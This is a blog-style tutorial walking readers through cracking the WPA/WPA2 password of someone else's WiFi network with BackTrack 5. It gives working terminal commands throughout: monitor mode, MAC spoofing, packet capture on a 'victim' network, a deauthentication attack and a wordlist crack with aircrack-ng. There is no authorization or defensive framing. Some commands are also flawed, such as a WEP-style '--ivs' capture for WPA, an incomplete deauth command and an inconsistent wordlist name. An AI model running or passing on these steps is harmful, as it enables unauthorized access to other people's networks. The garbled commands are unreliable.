How to Hack WPA/WPA2 encryption with BackTrack

5 comments

In previous post we learn how to hack WEP encrypted WiFi password. And now in this post i teach you how to hack WPA/WPA2 encryption with BackTrack. But this is very difficult, because WPA/WPA2 is a very good security. And we need BackTrack 5 R3 KDE. Download installation file and install it on computer.

1. Start machine and open Dolphin file manager.


Now go to the directory Root.


Then go to location pentest=>passwords=>wordlists and now you can see darc0de.lst file.


Copy it to the desktop.
2. Open terminal and type in airmon-ng and hit enter, after that type airmon-ng start wlan0 and again hit enter.
3. Now to be sure that monitor mode is turned on, we need to type on terminal airmon-ng and again hit enter. If you see mon0 link then you can continue, ( But maybe instead of mon0 you can have another name ) if no then repeat previous steps.


4. Now in terminal type ifconfig mon0 down and hit enter, and then again type macchanger -m 00:11:22:33:44:55 mon0 hit enter, and now we need to type ifconfig mon0 up and again hit enter.

5. Now need to scan wifi, so continue typing, and at this time you need to type airodump-ng mon0 command and hit enter. And its scan for WiFi networks, you need to wait some time while its finished. And then choose from list which one you want to hack. But make sure its have a WPA/WPA2 encryption.


6. Now type on terminal airodump-ng -c victim wifi channel -w WPACRACK10 --bssid victim wifi BSSID --ivs mon0 command and hit enter. ( WPACRACK10 is  an example name, you can write any name you want. Instead of victim wifi channel you need to write your chosen WiFi channel number. Instead of  Victim wifi BSSID you need to write your chosen WiFi bssid number ) 
How to find WiFi bssid and channel number, just look at picture given below.


After we enter that command we need to have same screen as in picture below.


7. Now open new terminal and type aireplay-ng -0 1 -e 2WIRE024 and hit enter ( 2WIRE024 is ESSID, to find ESSID of that WiFi you choose just look at first terminal window and you can see ESSID and change 2WIRE024 with your chosen WiFi ESSID, look at picture down ).


8. Continue typing on last opened terminal, and now type dir and hit enter and after that type aircrack-ng -w /root/Desktop/darkc0de.lst WPACRACK10-01.ivs and hit enter ( /root/Desktop/darkc0de.lst is a direction of that file we copied into the desktop in step 1 ).
WPACRACK10-01.ivs is a file name we give it on step six.


Now its start password cracking process. This can take a long time.



9. Do not forget this step, go to first terminal and press ctrl+c which stop the shake process and minimize the terminal, do not close it.

10. After password cracked you can see it on terminal, as in picture below.



Now you have a password of that wireless connection, and you can connect to the network.

5 comments :